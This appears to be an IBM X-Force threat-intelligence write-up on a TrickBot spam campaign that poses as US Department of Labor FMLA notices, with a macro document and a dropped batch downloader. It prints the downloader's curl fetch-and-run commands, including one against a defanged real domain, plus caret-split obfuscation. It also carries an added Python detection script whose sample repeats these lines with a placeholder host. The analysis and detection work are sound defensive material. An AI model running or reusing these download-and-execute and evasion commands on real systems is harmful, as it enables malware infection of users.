IBM X-Force monitors billions of spam emails a year, mapping trending, malicious campaigns and their origins. Recent analysis from our spam traps uncovered a new Trickbot campaign that currently targets email recipients with fake messages purporting to come from the U.S. Department of Labor (DoL). The spam leverages the Family and Medical Leave Act (FMLA), which gives employees the right to medical leave benefits, as context around COVID-19 in order to distribute the malware.

Figure 1: Fake FMLA-themed email distributing malicious payloads

TrickBot is a sophisticated banking Trojan operated by an organized cybercrime gang. Users infected with the TrickBot Trojan will see their device become part of a botnet that can allow attackers to gain complete control of the device. Typical consequences of TrickBot infections are bank account takeover, high-value wire fraud, and possibly ransomware attacks targeting organizational networks. TrickBot is not limited to these types of attacks and X-Force has been seeing it dabble in additional cybercrime endeavors in the recent past, specifically teaming up with ITG08, known as FIN6, to carry out financially motivated attacks on the retail sector.

Spam purporting to come from official and government entities has been increasing considerably during the COVID-19 pandemic, with cybercriminals developing spam to match trending news, developments, merchandise and initiatives surrounding the outbreak as a means to deliver unsolicited emails that attract recipients to open and launch attachments.

DocuSign-Themed Maldocs and Malicious Macros

The email sample we started with, US-DoL.eml, contains three attachments: us-logo.png, faq.png and Family and Medical Leave of Act 22.04.doc. The .PNG files are benign image files that are visible in the HTML version of the email and contain a DoL logo and FAQ | CONTACT US, respectively. The document file is the malicious component.

Malicious document files are one of the most popular ways for cybercriminals to distribute malware. In the spam samples we looked at, the eventual TrickBot payload started out in a DocuSign-type attachment titled Family and Medical Leave of Act 22.04.doc. Once opened, the document asks the recipient to enable macros. The macro code (ThisDocument.cls) runs when the file is closed, launching malicious scripts that fetch the malware from the attacker's designated domain.

The macro begins by creating a local directory, C:\Test, and drops a batch file, terop.bat, to that location. It then executes that file: C:\Test\terop.bat.

Overall, the following files are used in the infection chain:

| File Name | File Category | File Hash (MD5) | Parent |
|---|---|---|---|
| US-DoL.eml | Email | f481ba37fdcfaee9fa991e203963bad8 | N/A |
| Family and Medical Leave of Act 22.04.doc | Carrier File | d341215eb15167870aeff64d5380a69b | US-DoL.eml |
| terop.bat | Downloader | 9f52f07856cdf2b076c27ae60cb0d100 | Family and Medical Leave of Act 22.04.doc |
| faq.png | Benign | eb77c6a9fc86bd73d77b92c24ca889db | US-DoL.eml |
| us-logo.png | Benign | 1af19e6717acf7f38b8f1a651c738954 | US-DoL.eml |

Terop.bat

The primary purpose of terop.bat is to download a PE file and execute it using the following two commands:

curl https[:]//www[.]omegasystemsuae[.]com/9hfudnsfl.exe --output %appdata%/Bio_Tecs.exe

rundll32.exe zipfldr.dll,RouteTheCall %appdata%\Bio_Tecs.exe

Some of the command keywords are split across lines with the caret (^) escape character, which cmd.exe joins back together at run time. This hides the keyword from simple string matching; TIMEOUT, for example, is written as:

TI^
ME^
OUT ^

Terop.bat contains TIMEOUT /T 30 and ping 8.8.8.8 commands to evade detection and delay execution.

Next, a persistent route (the -p flag) is added with the following command:

add 10.0.0.0 mask 255.0.0.0 10.35.8.1 -p

This route appears to be needed for testing. The pathname, C:\Test, which terop.bat is initially written to, may suggest that this downloader is still being tested by those distributing the malware, which could explain some failures to fetch the final stage payload down the line.

Using the cURL utility, the terop.bat file attempts to download an executable from what appears to be a hijacked or compromised domain: hxxps://www.omegasystemsuae[.]com/9hfudnsfl.exe

The file is set to be written to %APPDATA%\Bio_Tecs.exe. However, since cURL is not available as part of a standard Windows deployment and it was not dropped by the malicious macro, that command ultimately failed and did not actually download the file.

Zipfldr.dll

zipfldr.dll is a standard Windows dynamic link library (DLL) that can be used as an alternate way to execute PE files through its exported function RouteTheCall. This command also fails, because the file was never downloaded and written to the designated location, %APPDATA%\Bio_Tecs.exe, by the cURL command.
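The batch-level techniques described in this and the preceding sections (caret-split keywords, TIMEOUT and ping delays, a cURL download into %APPDATA%, execution through zipfldr.dll's RouteTheCall export, and a persistent route add) are all visible in the dropped batch file once the caret escaping is undone. The following Python script is an added example written for this page, not code from IBM X-Force or from the campaign: it normalizes a batch file the way cmd.exe would (joining caret-continued lines and removing character escapes) and then runs a small set of detection rules over the result. The sample batch content, the domain and the path in it are constructed for the example and are not the campaign's indicators; the rule names are the example's own.

```python
import re

# Constructed sample modelled on the terop.bat behaviour described above.
# The URL is a placeholder, not the campaign's real download location.
SAMPLE_BAT = r"""@echo off
TI^
ME^
OUT ^
/T 30
ping 8.8.8.8 -n 5
c^url https://example.invalid/payload.exe --output %appdata%/Bio_Tecs.exe
rundll32.exe zipfldr.dll,RouteTheCall %appdata%\Bio_Tecs.exe
route add 10.0.0.0 mask 255.0.0.0 10.35.8.1 -p
"""

# Detection rules (example names) applied to each normalized line.
RULES = {
    "delay_timeout": re.compile(r"^\s*timeout\s+/t\s+\d+", re.I),
    "delay_ping": re.compile(r"^\s*ping\s+\S+", re.I),
    "curl_download_to_appdata": re.compile(
        r"\bcurl\b.*(?:--output|-o)\s+%appdata%", re.I),
    "rundll32_zipfldr_routethecall": re.compile(
        r"\brundll32(?:\.exe)?\s+zipfldr\.dll\s*,\s*routethecall\b", re.I),
    "persistent_route_add": re.compile(r"^\s*route\s+add\b.*\s-p\b", re.I),
}


def normalize_batch(text: str) -> str:
    """Approximate cmd.exe's caret handling so split keywords reappear.

    1. A caret at the end of a line escapes the line break, so the next
       line is appended (TI^ / ME^ / OUT ^ -> TIMEOUT).
    2. A caret in front of any other character escapes that character,
       so c^url becomes curl.
    """
    joined = re.sub(r"\^\r?\n", "", text)
    return re.sub(r"\^(.)", r"\1", joined)


def scan_batch(text: str) -> dict:
    """Return {rule_name: [matching normalized lines]} for rules that fire."""
    findings = {}
    for line in normalize_batch(text).splitlines():
        if not line.strip():
            continue
        for name, pattern in RULES.items():
            if pattern.search(line):
                findings.setdefault(name, []).append(line.strip())
    return findings


def total_delay_seconds(text: str) -> int:
    """Sum the TIMEOUT /T values so a sandbox window can be sized to outlast them."""
    total = 0
    for m in re.finditer(r"^\s*timeout\s+/t\s+(\d+)", normalize_batch(text), re.I | re.M):
        total += int(m.group(1))
    return total


if __name__ == "__main__":
    for rule, lines in scan_batch(SAMPLE_BAT).items():
        print(f"[{rule}]")
        for l in lines:
            print("   ", l)
    print("declared TIMEOUT delay:", total_delay_seconds(SAMPLE_BAT), "s")
```

Two points follow from the script. Pattern matching on the raw file misses TIMEOUT and curl entirely because of the caret splitting, so normalization has to come before any rule evaluation, whether in a mail gateway, an EDR script scanner or a YARA pre-processing step. And the combined TIMEOUT and ping delays are a cheap way to outwait short sandbox detonation windows, so the detonation time should comfortably exceed the delays the file declares.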

Robocopy.exe

Another executable that takes part in the overall infection routine is Robocopy.exe, which is used to move files. However, during our analysis we noticed that the macro failed to write the command correctly to the batch file: the VBA variables were not expanded and the string concatenation was left in place, so the command failed when the batch file was executed:

robocopy " & sSource & " /e /z /s " & sPath & " D:\Files E:\Backup " & sFile

Is It TrickBot?

Without the actual payload, is this TrickBot or another malware? Based on similar patterns observed in previous TrickBot campaigns, the "Macro on Close" function combined with the DocuSign theme has been a tactic used by this malware's distributors. Another link to TrickBot is an IP address, 198.72.111.141, previously linked with hosting TrickBot campaigns.

It is possible that the malware is being distributed by the same parties with a different final payload, but TrickBot tends to reuse the same distribution channels, compared to more commercialized malware.

Endless COVID-19-Themed Spam Continues to Deliver Malware

As the COVID-19 pandemic continues to hold the attention of people everywhere in an unprecedented manner, we are sure to continue seeing the use of this theme in endless amounts of spam and attacks targeting users across the globe.

The current spam is likely an early warning to those expecting to take advantage of the FMLA during the pandemic to be on the lookout for malicious campaigns. TrickBot spam varies frequently depending on those distributing it, and the issues we detected in the macro scripts are likely to be fixed and relaunched in further spamming activity.

TrickBot is one of the leading and most sophisticated banking Trojans active in the wild this year. It is involved in high-stakes bank fraud, ransomware attacks and big game hunting activity that targets organizations around the globe.

Get indicators of compromise (IoCs) for this campaign on X-Force Exchange, and follow our collections on emerging threat intelligence to keep up to date about trending campaigns.
